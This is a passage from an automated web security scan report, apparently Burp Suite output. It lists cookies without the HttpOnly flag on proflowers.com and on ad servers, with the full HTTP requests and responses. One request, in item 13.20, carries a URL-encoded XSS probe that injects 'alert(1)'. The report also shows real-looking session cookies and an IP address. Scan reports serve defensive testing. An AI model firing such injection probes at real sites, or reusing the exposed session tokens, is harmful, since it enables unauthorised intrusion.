<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
13.17. http://www.proflowers.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
13.18. http://www.proflowers.com/house-plants-PBS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
13.19. http://www.proflowers.com/mothers-day-flowers-MDF  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
13.20. http://www.proflowers.com/send-flowers-bsl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
13.21. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
13.22. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
13.23. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1657&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_de95=ahc%3Aljs1%3A1; rth=2-ljzkpb-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 01:01:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1046365390/?label=JkM_CPa6iwIQzon58gM&amp;guid=ON&amp;script=0
Connection: close
Set-Cookie: T_de95=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ck8y=gj9%3Ax0sd%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-gj9~x0sd~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Content-Length: 0

13.24. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1079972&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!$s!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<y]81!!tjQ!!!!$<xqZB!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!